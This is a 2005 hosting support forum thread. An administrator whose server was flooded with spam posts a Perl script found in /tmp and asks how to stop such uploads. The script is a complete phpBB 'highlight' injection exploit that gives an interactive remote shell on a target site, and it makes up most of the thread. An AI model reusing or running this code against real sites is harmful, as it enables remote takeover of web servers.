1. Please take a little time for this simple survey! Thank you for participating!
    Dismiss Notice

perl script uploaded to site

Discussion in 'Plesk for Linux - 8.x and Older' started by ElricM, Jul 3, 2005.

  1. ElricM

    ElricM Guest

    0
     
    Two days ago, my site became super sluggish, I was configuring apache and got an error there no no available sockets, then I noticed I had almost 400,000 spam messages in the mail queue. So I rebooted the system, stopped the queue and deleted all the messages with qmail-remove. Today I found this in the /tmp directory:

    /tmp/outlaw/trash4.pl
    Code:
    use strict;
    use IO::Socket;
    
    unless ($ARGV[0]) { print "$0 <viewtopic url>\n"; exit(1); }
    
    $ARGV[0] =~ m![url]http://[/url](.*?)/(.*?t=\d+)!;
    my ($server, $port) = split (/:/,$1);
    $port   = 80 unless defined($port);
    $server  = $1 unless defined($server);
    my ($url, $command) = $2;
    
    print "$server - $port - $url\n";
    
    while () {
    		print "trash4> ";
    		while(<STDIN>) {
    				$command=$_;
    				chomp($command);
    				last;
    		}
    		&send($command);
    }
    
    sub send {
        my $ok	=	0;
        my $cmd	= "echo \"#PHPBBEXPLOIT#\";".$_[0].";echo \"#PHPBBEXPLOIT#\"";
        my $string  = "GET /$url&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.1\n".
    					"Host: $server\nPHP: $cmd\n\n\n\n";
        my $socket = IO::Socket::INET->new(PeerAddr => $server,
    				PeerPort => $port,
    				Proto    => "tcp",
    				Type     => SOCK_STREAM)
    				or die "can't connect to: $server : $@\n";
    	print $socket $string;
    	while(<$socket>) {
    		if (/#PHPBBEXPLOIT#/) {
    				close($socket) and last if $ok eq 2;
    				$ok++;
    				next;
    		}
    		print if $ok eq "1";
    	}
    }
    exit 0;
    
    How do you prevent/detect stuff like this from being uploaded and executed?
     
  2. EvolutionCrazy

    EvolutionCrazy Basic Pleskian

    23
    90%
    Joined:
    Jun 4, 2005
    Messages:
    65
    Likes Received:
    0
  3. ElricM

    ElricM Guest

    0
     
    Thanks a bunch. Very helpful
     
Loading...